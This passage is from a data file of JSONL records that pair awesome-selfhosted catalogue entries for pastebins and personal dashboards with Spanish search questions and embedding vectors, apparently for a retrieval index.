0.02163, 0.08299, -0.06744, -0.08296, 0.01031, -0.13143, 0.07661, 0.12757, 0.03394, -0.0966, 0.02301, 0.00609, 0.0617, -0.01349, -0.01737, -0.02573, 0.11992, 0.00923, -0.03707, -0.01345, -0.01939, -0.08578, 0.00779, 0.0597, 0.00577, -0.03843, 0.09202, 0.08781, 0.04901, 0.02471, 0.10517, -0.00383, -0.09166, 0.00626, -0.04754, -0.05321, 0.05825, 0.0564, 0.0425, -0.09233, 0.03157, 0.00539, -0.03116, -0.01576, 0.0038, -0.07431, -0.01932, -0.04908, 0.0743, -0.0821, -0.03848, -0.07844, -0.12906, 0.00401, 0.0069, 0.02849, -0.01105, -0.02797, 0.0097, -0.06063, -0.01091, -0.05385, 0.11065, -0.0437, 0.08346, -0.08623, -0.02746, -0.01952, -0.0481, -0.10374, -0.02483, -0.08413, -0.03498, 0.06629, -0.0686, 0.00915, 0.05721, -0.01062, 0.01464, 0.01404, 0.00803, 0.09697, -0.02938, 0.03294, -0.05191, -0.04957, 0.00395, -0.08156, 0.05364, -0.03272, 0.08395, -0.02745, -0.01767, -0.04528, -0.09433, -0.02842, 0.12837, 0.02424, 0.0218, 0.02524, 0.02903, -0.02496, -0.03955, 0.01003, 0.01793, -0.05121, -0.03451, 0.05844, 0.0027, 0.04101, -0.06403, 0.04161, -0.03415, -0.00502, -0.0806, 0.01388, -0.04893, 0.05473, 0.00678, -0.06764, 0.02896, 0.03144, -0.02764, -0.0015, -0.00988, -0.02576, -0.02544, -0.04941, -0.01232, -0.13703, -0.02766, -0.07992, 0.00898, 0.02949, -0.0087, -0.03656, -0.01927, -0.0391, -0.01061, -0.01146, -0.00038, -0.0229, 0.02691, -0.05238, 0.03959, -0.00141, 0.01861, 0.06801, -0.02112, 0.08628, -0.00217, -0.01768, -0.01208, 0.00096, 0.02951, -0.06444, 0.00328, 0.07204, 0.01067, 0.05685, -0.04557, -0.05336, 0.01812, 0.0083, 0.04869, -0.022, 0.03072, -0.0128, 0.00131, -0.04765, 0.03379, 0.05628, 0.00408, -0.00897, 3e-05, 0.01879, -0.08373, 0.02277, 0.06551, -0.03503, -0.04374, -0.00033, 0.03008, -0.07534, -0.00588, -0.03491, -0.07106, -0.04284, 0.01625, 0.01196, -0.01946, 0.04685, 0.02439]} -{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: lesma β€” Simple paste app friendly with browser and command line [GPL-3.0, Rust/Docker]. Local Content Share β€” Store and share text snippets and files within your local network [MIT, Docker/Go]. not-th.re β€” Simple paste sharing platform, with client side encryption, featuring the monaco browser-based code editor [AGPL-3.0, Nodejs/Docker]. Opengist β€” Pastebin powered by Git [AGPL-3.0, Docker/Go/Nodejs]. paaster β€” End-to-end encrypted pastebin built with the objective of simplicity [AGPL-3.0, Docker]. pacebin β€” Super-minimal pastebin and file upload service focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Password Pusher β€” Dead-simple application to securely communicate passwords (or text) over the web. Passwords automatically expire after a certain number of views and/or time has passed [Apache-2.0, Docker/K8S/Ruby]. Pastefy β€” Beautiful, simple and easy to deploy Pastebin with optional client encryption, multitab pastes, an API, a highlighted editor and more [MIT, Docker/K8S/Java].", "indexar": "quΓ© programa puedo usar para guardar y compartir fragmentos de texto y archivos en mi red local?", "v": [-0.02993, 0.07971, -0.11076, -0.22485, -0.05722, -0.03404, -0.03984, -0.04187, 0.00784, -0.1408, -0.15667, -0.1221, -0.03511, -0.01024, 0.05656, 0.03069, 0.17552, 0.01696, 0.07454, -0.00076, -0.04106, -0.01432, -0.08526, -0.0384, -0.01375, -0.03985, 0.07546, -0.0578, -0.05874, 0.05576, -0.01994, 0.02873, 0.04395, -0.07383, -0.11092, 0.03892, 0.19632, 0.06134, -0.08841, -0.01779, 0.01848, 0.12995, -0.07013, 0.0733, -0.04103, -0.06995, 0.01465, -0.01592, -0.05996, 0.01921, -0.00912, -0.0725, -0.04356, 0.00432, -0.08154, -0.0202, 0.06895, -0.15403, -0.00412, 0.08264, -0.03404, 0.04616, -0.07097, 0.00805, 0.01479, -0.07091, -0.01304, 0.07708, -0.19603, 0.16649, -0.05118, 0.09398, 0.03256, 0.03212, -0.03866, 0.09667, -0.06513, -0.10343, 0.06642, 0.00938, -0.00534, 0.04723, 0.06668, 0.04827, 0.02322, -0.09726, 0.07402, -0.06607, -0.00747, -0.01748, 0.00066, -0.12111, 0.02982, 0.00392, -0.00119, -0.09323, 0.06825, 0.0539, -0.03014, 0.01326, 0.07427, -0.07105, 0.00655, 0.07076, 0.05913, 0.07906, -0.04346, 0.06497, 0.0922, -0.01659, 0.07371, -0.03728, -0.08479, 0.06371, -0.07893, -0.01405, 0.04009, 0.0087, 0.02308, -0.04791, -0.03259, 0.06113, -0.08835, -0.01398, 0.12241, -0.02292, 0.01529, 0.15427, -0.16247, 0.10036, -0.01811, 0.05223, -0.04712, -0.1559, -0.04031, -0.05751, 0.0444, -0.02141, -0.01149, -0.02849, -0.01107, -0.02035, -0.08178, 0.03703, 0.00795, 0.09194, 0.00819, -0.04654, 0.01362, -0.02486, -0.00743, -0.04374, -0.03117, -0.06044, -0.04671, 0.02514, 0.11927, -0.07689, -0.0917, -0.01962, -0.05777, 0.02842, -0.04434, -0.01421, 0.04364, -0.112, 0.02231, 0.02772, 0.0696, 0.02707, 0.03784, 0.07053, -0.02396, -0.08081, 0.00032, -0.01114, -0.03755, -0.06081, -0.00921, -0.01347, -0.03129, 0.01618, 0.01996, 0.12045, 0.01846, -0.04163, 0.02858, 0.04151, -0.05972, -0.01099, -0.01501, -0.02974, 0.04034, 0.03518, -0.00673, -0.01696, -0.01352, 0.00417, 0.04849, 0.00216, -0.079, -0.01968, -0.02798, 0.03651, 0.04921, 0.01717, -0.07351, 0.00374, 0.03721, 0.08469, 0.01106, 0.0138, 0.05979, 0.0065, -0.06644, 0.00141, 0.02605, 0.0769, 0.04237, -0.00136, 0.07777, 0.02148, 0.03436, 0.01674, 0.03604, -0.04287, -0.01649, -0.03211, 0.0319, 0.02357, -0.03491, -0.00854, -0.02973, 0.03354, 0.01439, -0.04944, -0.00701, -0.00378, -0.00616, -0.06962, -0.02039, 0.10724, -0.0166, -0.05783, -0.05223, 0.02447, -0.09769, 0.0488, -0.0089, -0.00857, -0.00998, -0.03893, 0.02578, -0.06264, 0.03738, 0.04268]} -{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: lesma β€” Simple paste app friendly with browser and command line [GPL-3.0, Rust/Docker]. Local Content Share β€” Store and share text snippets and files within your local network [MIT, Docker/Go]. not-th.re β€” Simple paste sharing platform, with client side encryption, featuring the monaco browser-based code editor [AGPL-3.0, Nodejs/Docker]. Opengist β€” Pastebin powered by Git [AGPL-3.0, Docker/Go/Nodejs]. paaster β€” End-to-end encrypted pastebin built with the objective of simplicity [AGPL-3.0, Docker]. pacebin β€” Super-minimal pastebin and file upload service focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Password Pusher β€” Dead-simple application to securely communicate passwords (or text) over the web. Passwords automatically expire after a certain number of views and/or time has passed [Apache-2.0, Docker/K8S/Ruby]. Pastefy β€” Beautiful, simple and easy to deploy Pastebin with optional client encryption, multitab pastes, an API, a highlighted editor and more [MIT, Docker/K8S/Java].", "indexar": "con quΓ© herramienta puedo crear un servicio de pastebin que guarde el contenido en Git?", "v": [-0.03008, 0.07729, -0.15337, -0.10372, 0.00515, -0.11354, -0.03794, 0.00759, -0.05529, -0.11934, -0.06113, 0.02191, -0.09634, 0.00609, -0.00358, 0.09926, 0.10192, -0.08195, -0.05923, 0.13234, -0.04608, 0.03124, 0.10555, -0.12236, -0.14896, -0.02211, 0.17262, -0.08295, -0.1732, 0.17914, -0.02765, -0.02103, -0.09304, -0.10042, -0.15485, -0.08625, 0.02552, 0.1288, -0.05104, 0.08581, -0.03784, -0.10619, -0.0188, 0.05963, -0.00811, -0.02656, 0.06146, 0.02964, 0.0169, 0.06014, -0.04838, -0.14507, -0.08766, -0.09995, -0.02694, -0.09866, 0.13825, -0.17234, -0.06831, -0.0665, -0.08223, 0.02959, -0.00994, -0.06682, -0.03852, -0.05008, -0.01307, 0.04975, -0.12489, 0.0892, -0.0716, -0.08185, -0.04777, 0.01679, 0.00034, 0.00289, -0.04043, 0.01118, -0.09354, 0.08679, -0.00441, 0.06721, -0.07277, -0.03223, -0.10383, -0.05709, -0.00599, -0.045, -0.0043, -0.09433, 0.06823, 0.0619, -0.07142, 0.08717, -0.07035, -0.01373, 0.09346, -0.12141, -0.02462, -0.03823, 0.15783, -0.05724, -0.08739, 0.1462, -0.002, -0.03399, 0.00967, -0.01696, -0.03075, -0.02649, 0.0652, 0.0005, -0.038, -0.02343, -0.00377, 0.01626, -0.06663, -0.06495, -0.00443, -0.0416, 0.04506, 0.0223, -0.05761, -0.029, 0.09745, 0.05619, 0.00161, 0.07031, -0.0738, -0.06889, -0.06439, -0.03518, -0.07398, -0.05205, -0.03176, -0.026, 0.01094, -0.10361, -0.01802, 0.01393, 0.03352, -0.0185, 0.02147, 0.00789, 0.02748, 0.00304, 0.03691, -0.07755, -0.05069, 0.05163, -0.02236, -0.06153, -0.03372, 0.01712, -0.08119, 0.05502, -0.03141, -0.02337, -0.05756, 0.06966, -0.03279, -0.0055, 0.00079, 0.03747, -0.0105, -0.06243, 0.02504, 0.0283, 0.0602, 0.01212, -0.04996, 0.01013, 0.05609, -0.08974, -0.00401, -0.02981, -0.10125, -0.04892, -0.01575, -0.07984, -0.05586, -0.01724, -0.08168, -0.00211, 0.00711, -0.08569, 0.00759, -0.06011, -0.01319, 0.0479, -0.02862, 0.03786, 0.05072, -0.03631, 0.02299, -0.03021, -0.01882, -0.06177, 0.04393, -0.00671, -0.00562, -0.02289, 0.02214, -0.00463, -0.00191, 0.00108, -0.06344, 0.03773, -0.03173, 0.01921, 0.01212, -0.01955, 0.01289, -0.05396, 0.03112, 0.03703, -0.01039, -0.01347, -0.04962, -0.01968, 0.05738, -0.02788, 0.01738, -0.04197, -0.05436, 0.03887, -0.02604, 0.0342, 0.0093, 0.0109, 0.0112, -0.04305, -0.06308, -0.04339, 0.00204, -0.02988, 0.04108, -0.0073, -0.02983, -0.03229, -0.02332, 0.0652, -0.03211, 0.00134, 0.00535, -0.01736, -0.0264, 0.02721, -0.04668, -0.13087, -0.04293, -0.00309, 0.03877, -0.04641, 0.02172, -0.04016]} -{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: lesma β€” Simple paste app friendly with browser and command line [GPL-3.0, Rust/Docker]. Local Content Share β€” Store and share text snippets and files within your local network [MIT, Docker/Go]. not-th.re β€” Simple paste sharing platform, with client side encryption, featuring the monaco browser-based code editor [AGPL-3.0, Nodejs/Docker]. Opengist β€” Pastebin powered by Git [AGPL-3.0, Docker/Go/Nodejs]. paaster β€” End-to-end encrypted pastebin built with the objective of simplicity [AGPL-3.0, Docker]. pacebin β€” Super-minimal pastebin and file upload service focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Password Pusher β€” Dead-simple application to securely communicate passwords (or text) over the web. Passwords automatically expire after a certain number of views and/or time has passed [Apache-2.0, Docker/K8S/Ruby]. Pastefy β€” Beautiful, simple and easy to deploy Pastebin with optional client encryption, multitab pastes, an API, a highlighted editor and more [MIT, Docker/K8S/Java].", "indexar": "cuΓ‘l es una alternativa libre para enviar contraseΓ±as o mensajes seguros con cifrado de extremo a extremo?", "v": [0.08385, 0.10802, -0.06968, -0.03644, -0.03569, -0.10085, -0.12359, -0.1217, -0.11203, -0.09572, -0.00082, -0.06953, 0.02049, -0.03438, 0.11622, -0.03623, 0.10467, 0.05417, 0.11134, 0.03636, 0.11832, -0.07097, -0.0814, -0.10378, -0.01552, -0.1065, -0.06573, 0.03891, -0.07247, 0.05663, 0.06188, -0.02724, 0.16672, -0.011, -0.01017, 0.13707, 0.09127, 0.12618, 0.05658, 0.06961, 0.13685, 0.0169, -0.08794, -0.03227, -0.03497, -0.07713, -0.07072, 0.12173, 0.13625, -0.03764, -0.03786, -0.0779, -0.09231, -0.09519, -0.07991, 0.01111, 0.19272, -0.01079, 0.02194, -0.10238, -0.03235, 0.09153, 0.03455, 0.11073, -0.01442, -0.10481, 0.00741, 0.01394, -0.13047, -0.00028, 0.02944, -0.0442, -0.07404, 0.09936, -0.02813, 0.01282, -0.12169, 0.03193, -0.09701, 0.14528, -0.05072, -0.09143, -0.00063, 0.01453, -0.10004, -0.05364, 0.03328, -0.02978, 0.02505, -0.03984, 0.1407, -0.00679, -0.01325, 0.09589, -0.1026, -0.04559, -0.0404, -0.00934, -0.0738, 0.08933, 0.04195, 0.03734, -0.04521, 0.01698, -0.04989, -0.05261, -0.03391, -0.01111, 0.04589, 0.01429, 0.00638, 0.00239, 0.06549, -0.05042, -0.00643, -0.05311, -0.01688, -0.03259, 0.10036, -0.04193, -0.05857, 0.05243, 0.05941, 0.00915, 0.04407, 0.03637, 0.00336, -0.01074, -0.05025, 0.01489, -0.06594, -0.09053, -0.07567, -0.06469, -0.07988, 0.09492, -0.01422, -0.04439, -0.02525, 0.04909, -0.04001, 0.08159, -0.06187, -0.06965, 0.01594, 0.04697, -0.01824, -0.02435, -0.05713, 0.03147, -0.00067, 0.06232, -0.01313, 0.08979, -0.06054, 0.02859, -0.01143, -0.075, -0.01798, 0.10207, 0.0707, -0.01478, -0.0311, 0.05308, -0.00882, -0.02477, 0.01991, 0.01077, 0.00424, -0.01181, -0.01561, 0.049, 0.05913, -0.0646, 0.02897, -0.05503, 0.0075, -0.08657, -0.03238, -0.09078, 0.00722, 0.01817, -0.06356, -0.01223, 0.07646, -0.03361, 0.05521, 0.04181, 0.04218, 0.1018, -0.01482, 0.0321, -0.05225, 0.01004, -0.02843, -0.01168, -0.03169, -0.08264, -0.02586, -0.04539, -0.03115, -0.02676, -0.02739, -0.04682, -0.01351, -0.00109, -0.15922, 0.01978, -0.03106, 0.08949, 0.06057, -0.04809, 0.05739, -0.02462, -0.05522, -0.01715, 0.01801, 0.01475, -0.0091, 0.02821, 0.04123, 0.02086, -0.01928, -0.01549, -0.01876, 0.052, -0.01524, 0.07016, 0.00809, 0.02484, -0.0045, 0.03492, -0.03302, 0.06111, 0.11292, 0.03262, -0.05372, -0.02582, -0.0008, -0.05983, 0.00077, 0.0482, 0.00637, -0.00628, -0.03762, 0.01747, -0.09622, 0.05579, -0.02314, 0.00568, -0.05328, 0.03417, -0.00654, -0.01524, 0.03668, -0.07447]} -{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: PrivateBin β€” Minimalist pastebin/discussion board where the server has zero knowledge of hosted data [Zlib, PHP]. rustypaste β€” Minimal file upload/pastebin service [MIT, Rust]. Snipo β€” Lightweight, self‑hosted snippet manager for saving and organizing code and text snippets with folders, tags, API, and GitHub Gist sync [AGPL-3.0, Go/Docker]. SnyPy β€” Open source on-prem code snippet manager [MIT, Docker]. Sup3rS3cretMes5age β€” Very simple (to deploy and to use) secret message service using Hashicorp Vault as a secrets storage [MIT, Go]. Wastebin β€” Lightweight, minimal and fast pastebin with an SQLite backend [MIT, Rust/Docker]. Yopass β€” Secure sharing of secrets, passwords and files [Apache-2.0, Go/Docker].", "indexar": "que programa me sirve para guardar y compartir notas de cΓ³digo", "v": [-0.07192, 0.09174, -0.13439, -0.23158, -0.0854, -0.23409, -0.00815, 0.00294, -0.03601, -0.1482, -0.02885, -0.16569, 0.02945, -0.1008, -6e-05, -0.00278, 0.20421, -0.03851, 0.08862, 0.1156, 0.0121, 0.06882, -0.03474, -0.09174, -0.06353, 0.00094, 0.042, -0.03472, -0.0497, 0.11343, -0.01258, -0.08429, 0.07235, -0.09144, -0.12329, 0.07356, 0.19319, 0.03009, -0.06988, 0.00055, -0.01301, 0.10757, -0.01051, 0.07914, 0.03394, -0.06598, 0.02933, 0.09745, 0.05052, -0.01138, -0.01293, 0.01366, -0.00083, 0.01903, -0.03173, -0.04221, -0.02783, -0.05244, -0.10245, 0.04488, -0.02602, -0.06143, 0.00232, -0.10273, 0.00764, -0.02352, 0.05675, 0.04326, -0.16698, 0.09134, -0.05838, 0.10236, 0.02173, -0.07878, -0.02337, 0.01959, -0.026, -0.06859, 0.01796, 0.02964, -0.07222, 0.01233, -0.02462, 0.05676, 0.07388, -0.0489, 0.06261, -0.05696, -0.02434, 0.03201, 0.08296, -0.00324, -0.04248, 0.0491, 0.06054, -0.00377, 0.09313, 0.12319, 0.0745, 0.00394, 0.12806, -0.08919, 0.04614, 0.01164, 0.03913, 0.12709, 0.04838, 0.0173, 0.0423, 0.0975, -0.01844, -0.02648, -0.11587, -0.00255, -0.07853, -0.0159, 0.00199, -0.00632, -0.00102, -0.03837, -0.06055, 0.0413, -0.119, 0.05507, 0.09648, 0.02974, 0.00961, 0.11935, -0.03433, 0.07873, -0.09618, 0.01889, -0.00579, -0.00505, 0.02566, -0.0703, 0.04029, 0.01451, 0.04534, -0.0293, 0.01798, 0.03656, 0.01161, 0.0996, -0.02426, 0.06162, 0.04995, -0.01907, -0.03184, -0.01242, 0.00042, -0.00136, -0.05223, -0.04321, -0.0845, -0.01482, 0.04107, -0.02072, -0.10904, -0.03504, -0.08341, 0.02387, -0.01278, -0.07348, 0.03316, -0.07786, 0.02577, 0.02522, 0.07972, 0.0609, 0.0172, -0.00038, 0.09031, -0.10705, 0.00102, -0.05124, -0.02014, -0.09287, -0.03735, 0.0008, -0.07114, 0.05668, 0.09714, 0.06953, 0.00723, -0.00966, -0.0132, 0.08736, -0.00917, -0.01756, 0.03783, 0.01221, 0.00464, 0.02241, -0.001, -0.01265, -0.006, -0.00057, 0.02556, -0.02601, -0.05005, 0.01115, -0.00995, -0.03981, 0.03267, 0.04904, -0.05746, -0.01357, 0.04481, 0.07444, 0.00706, -0.03495, 0.03675, 0.00384, -0.0757, -0.01406, -0.00408, 0.11469, 0.0825, -0.01673, -0.00421, -0.03192, -0.00314, -0.005, 0.01414, -0.04767, -0.01887, 0.01794, 0.04059, -0.00311, -0.02639, -0.01765, -0.01517, 0.02555, 0.05735, -0.02917, -0.04649, -0.00014, -0.00836, -0.1031, -0.03216, 0.05291, -0.00522, -0.0694, -0.03855, 0.03393, -0.03655, -0.00415, -0.0198, -0.00575, -0.01334, -0.04477, 0.03192, -0.02999, -0.02059, 0.03635]} -{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: PrivateBin β€” Minimalist pastebin/discussion board where the server has zero knowledge of hosted data [Zlib, PHP]. rustypaste β€” Minimal file upload/pastebin service [MIT, Rust]. Snipo β€” Lightweight, self‑hosted snippet manager for saving and organizing code and text snippets with folders, tags, API, and GitHub Gist sync [AGPL-3.0, Go/Docker]. SnyPy β€” Open source on-prem code snippet manager [MIT, Docker]. Sup3rS3cretMes5age β€” Very simple (to deploy and to use) secret message service using Hashicorp Vault as a secrets storage [MIT, Go]. Wastebin β€” Lightweight, minimal and fast pastebin with an SQLite backend [MIT, Rust/Docker]. Yopass β€” Secure sharing of secrets, passwords and files [Apache-2.0, Go/Docker].", "indexar": "cual es una alternativa privada a pastebin que se pueda alojar yo mismo", "v": [-0.10967, 0.13855, -0.07798, 0.14959, -0.0568, -0.04604, 0.15617, -0.15986, -0.29824, -0.03686, 0.01735, -0.10527, -0.01578, 0.10068, 0.08865, -0.01453, 0.1012, 0.04586, 0.16694, 0.02929, -0.07281, 0.01192, -0.03079, 0.01375, -0.09019, 0.01338, 0.11164, -0.08705, -0.133, 0.04034, -0.03059, 0.04354, 0.09466, -0.14604, -0.00506, 0.08199, 0.10513, 0.08712, -0.04484, 0.06271, 0.03896, -0.11126, 0.02595, 0.10872, -0.03797, 0.07575, -0.17337, -0.00507, -0.03874, 0.03745, -0.13996, -0.00533, -0.07151, 0.01642, 0.11995, -0.01722, 0.122, -0.01658, 0.0519, -0.06215, -0.1319, -0.01789, 0.02356, -0.05443, 0.07081, -0.0324, -0.06555, 0.03476, -0.16462, -0.02125, 0.01514, 0.04648, -0.03355, 0.06376, -0.01032, 0.00566, 0.01656, 0.02708, 0.00954, 0.02106, -0.02045, -0.03321, 0.05595, 0.03316, -0.09067, -0.05013, 0.03018, 0.00808, 0.01753, 0.07638, 0.04087, -0.01638, 0.0224, 0.05886, -0.09584, -0.02703, 0.06462, 0.04459, -0.05812, -0.00985, 0.06907, 0.03201, -0.13471, 0.05297, 0.09167, -0.00233, -0.05047, 0.01185, -0.02399, 0.03389, 0.03934, 0.13621, -0.01076, -0.04665, 0.04412, -0.06955, -0.08891, -0.0361, -0.03028, -0.02426, -0.09613, -0.08642, -0.06776, -0.09817, 0.00555, 0.10247, -0.00559, 0.05376, -0.0623, 0.03056, -0.08976, 0.0082, -0.04102, -0.06146, -0.06804, 0.00052, -0.04006, -0.01309, 0.10508, 0.06195, 0.04002, 0.03062, 0.00927, -0.08373, -0.00979, -0.02587, -0.03049, -0.03646, -0.04099, 0.00726, -0.05768, 0.06641, -0.03532, 0.08657, -0.08444, 0.03767, -0.01486, -0.02616, 0.01096, 0.15754, 0.00323, -0.01496, -0.0516, -0.01219, -0.03074, -0.02925, -0.03863, -0.07114, -0.00149, 0.04034, -0.0309, 0.00709, -0.03987, -0.03556, 0.02213, -0.05599, -0.05163, -0.06913, -0.0023, -0.02071, 0.01114, 0.04279, -0.0863, -0.02811, 0.02121, 0.00425, -0.0357, -0.00767, -0.01224, -0.01617, -0.01728, -0.01281, -0.0551, -0.0297, -0.05333, -0.01975, -0.01216, -0.07808, 0.01037, 0.04618, -0.04192, -0.00651, -0.03102, -0.01705, 1e-05, -0.02729, -0.07592, 0.01294, 0.00598, 0.01143, 0.0364, 0.03578, 0.06197, -0.04955, -0.00294, 0.03356, 0.0028, -0.02052, -0.04513, 0.00943, 0.03383, 0.01073, 0.03822, -0.05374, -0.0227, 0.01554, -0.00836, 0.04709, -0.01645, 0.0743, -0.01184, 0.00663, -0.04122, 0.00651, 0.0041, 0.00665, -0.00136, -0.0777, 0.0171, -0.05208, 0.06671, 0.04256, 0.00968, 0.04289, -0.01601, 0.00093, -0.05409, -0.01438, 0.00578, -0.05033, 0.00448, 0.01955, 0.02313, 0.00099, 0.0981, 0.00992]} -{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: PrivateBin β€” Minimalist pastebin/discussion board where the server has zero knowledge of hosted data [Zlib, PHP]. rustypaste β€” Minimal file upload/pastebin service [MIT, Rust]. Snipo β€” Lightweight, self‑hosted snippet manager for saving and organizing code and text snippets with folders, tags, API, and GitHub Gist sync [AGPL-3.0, Go/Docker]. SnyPy β€” Open source on-prem code snippet manager [MIT, Docker]. Sup3rS3cretMes5age β€” Very simple (to deploy and to use) secret message service using Hashicorp Vault as a secrets storage [MIT, Go]. Wastebin β€” Lightweight, minimal and fast pastebin with an SQLite backend [MIT, Rust/Docker]. Yopass β€” Secure sharing of secrets, passwords and files [Apache-2.0, Go/Docker].", "indexar": "con que puedo montar un servicio seguro para enviar mensajes secretos", "v": [0.12428, 0.09583, -0.1971, -0.0931, -0.12776, -0.12192, -0.15132, -0.06479, -0.02324, -0.1344, -0.02763, -0.00041, 0.16873, -0.04784, 0.03413, 0.074, 0.14794, 0.07346, 0.08724, 0.07639, 0.1984, -0.03755, -0.07696, -0.12192, -0.06499, 0.01899, 0.06647, -0.02927, -0.02594, 0.04075, 0.05764, -0.01737, 0.07208, 0.00808, -0.02094, 0.03459, 0.06743, 0.08977, 0.04829, 0.02885, 0.07882, -0.04369, 0.00309, 7e-05, -0.05911, -0.02746, 0.01969, -0.00962, 0.04535, -0.03677, 0.0363, -0.11815, -0.10422, -0.06842, -0.12717, 0.00845, 0.17841, -0.01856, 0.03166, -0.03703, 0.03367, 0.03695, -0.00173, 0.12017, 0.04556, -0.0919, 0.04685, -0.02383, -0.1438, -0.03174, -0.00319, -0.03038, -0.01418, 0.11931, -0.04386, 0.06704, -0.13156, 0.04973, -0.08259, 0.13323, -0.02029, 0.03001, -0.04802, 0.06349, -0.05697, -0.06987, -0.0463, -0.07267, -0.01754, -0.09741, 0.09861, 0.04141, -0.00975, 0.11765, -0.02726, -0.0089, -0.0158, 0.01097, -0.03731, 0.05483, 0.04425, -0.02356, -0.00545, 0.14777, -0.01033, -0.04333, 0.05489, -0.05354, 0.14002, -0.01929, 0.00132, -0.02922, 0.00604, -0.00662, -0.04858, -0.08625, -0.02358, 0.01264, 0.03507, 0.02374, -0.13732, 0.07395, 0.10792, 0.09427, 0.06711, -0.0438, -0.00978, -0.00101, -0.04164, 0.05517, -0.09971, -0.02004, -0.07962, -0.057, 0.03665, 0.05475, -0.04751, -0.0287, -0.01539, 0.01698, 0.04486, 0.03933, -0.06179, -0.06191, 0.02249, 0.07678, -0.04053, -0.11866, -0.01916, -0.0029, 0.08176, 0.07481, -0.00648, 0.0223, -0.0019, -0.02238, 0.0419, -0.0621, 0.0505, 0.08596, 0.00733, 0.06852, -0.00108, 0.01223, -0.00909, -0.05556, -0.00541, 0.02127, 0.00852, 0.01064, -0.0351, 0.00764, 0.05548, -0.0439, 0.03372, 0.02638, -0.02444, -0.00553, -0.01199, -0.0545, -0.02379, 0.03187, -0.00128, 0.06207, -0.00527, -0.01926, -0.01276, -0.00433, 0.05016, 0.05135, -0.00978, -0.02788, -0.00891, 0.06358, -0.02482, -0.0362, -0.06251, -0.05738, 0.01085, -0.05835, -0.01163, -0.0053, -0.02522, -0.01902, -0.03283, -0.0382, -0.04108, 0.04073, 0.00691, 0.07375, 0.07035, -0.07535, 0.08766, -0.07474, -0.0354, 0.01659, 0.03447, -0.04825, -0.04931, 0.06423, 0.01525, 0.00192, 0.02712, -0.04236, -1e-05, 0.02722, 0.0077, 0.04449, 0.06002, 0.06372, -0.00605, 0.06927, -0.08268, 0.0294, 0.09216, 0.02004, 0.02239, -0.02128, -0.04204, -0.06815, 0.00677, 0.05525, 0.0375, -0.01244, 0.00639, -0.0557, -0.07925, 0.07935, -0.03639, -0.0229, 0.00015, 0.00805, -0.02094, -0.05402, 0.02636, -0.11943]} -{"tipo": "pregunta", "herramienta": "Personal Dashboards", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Personal Dashboards", "tema": "personal dashboards", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Personal Dashboards: Dashy β€” Feature-rich homepage for your homelab, with easy YAML configuration [MIT, Nodejs/Docker]. Glance β€” Highly customizable dashboard that puts all your feeds in one place [AGPL-3.0, Docker/Go]. gobookmarks β€” Landing page to display bookmarks stored in GitHub, GitLab or local Git [AGPL-3.0, Go/Docker]. Heimdall β€” Elegant solution to organise all your web applications [MIT, PHP]. Homarr β€” Sleek, modern dashboard with many integrations and web-based config [MIT, Docker/Nodejs]. Homepage by gethomepage β€” Highly customizable homepage (or startpage / application dashboard) with Docker and service API integrations [GPL-3.0, Docker/Nodejs]. Homepage by tomershvueli β€” Simple, standalone, self-hosted PHP page that is your window to your server and the web [MIT, PHP]. Homer β€” Dead simple static homepage to expose your server services, with an easy yaml configuration and connectivity check [Apache-2.0, Docker/K8S/Nodejs]. Hubleys β€” Personal dashboards to organize links for multiple users via a central yaml config [MIT, Docker].", "indexar": "que programa hay para crear un panel de inicio que muestre todos mis servicios y aplicaciones?", "v": [-0.0634, 0.14231, -0.04663, -0.24926, 0.0286, -0.10432, -0.01013, -0.04643, -0.17903, -0.09069, -0.10775, -0.06026, -0.01837, -0.0724, -0.02213, 0.04959, 0.07409, -0.12339, 0.1104, 0.03251, -0.07913, 0.0928, -0.07914, 0.00296, -0.10835, -0.01207, 0.01941, -0.12423, -0.04844, -0.00333, 0.00888, -0.01283, 0.04986, -0.15061, -0.01785, -0.14205, 0.08735, 0.02174, -0.04072, 0.04365, -0.06297, -0.01177, 0.02204, 0.10415, -0.00323, 0.00798, 0.07157, -0.00015, -0.0649, 0.076, 0.00965, -0.09831, -0.06652, 0.0263, 0.09201, -0.07397, -0.03112, -0.18751, -0.03923, -0.06836, -0.01974, 0.07399, -0.02677, -0.06591, 0.11489, -0.06871, 0.07509, 0.06834, -0.04493, 0.11338, -0.03146, 0.05106, 0.06398, -0.03129, 0.01348, 0.03317, -0.12029, -0.0586, -0.04347, -0.01029, -0.0416, 0.03032, -0.00334, 0.07952, -0.11457, -0.02434, 0.00782, 0.04484, 0.00161, -0.04742, 0.01198, 0.05228, -0.05386, 0.11304, 0.00997, -0.00546, 0.14096, 0.02512, 0.04843, 0.06365, 0.04014, -0.08236, -0.04396, 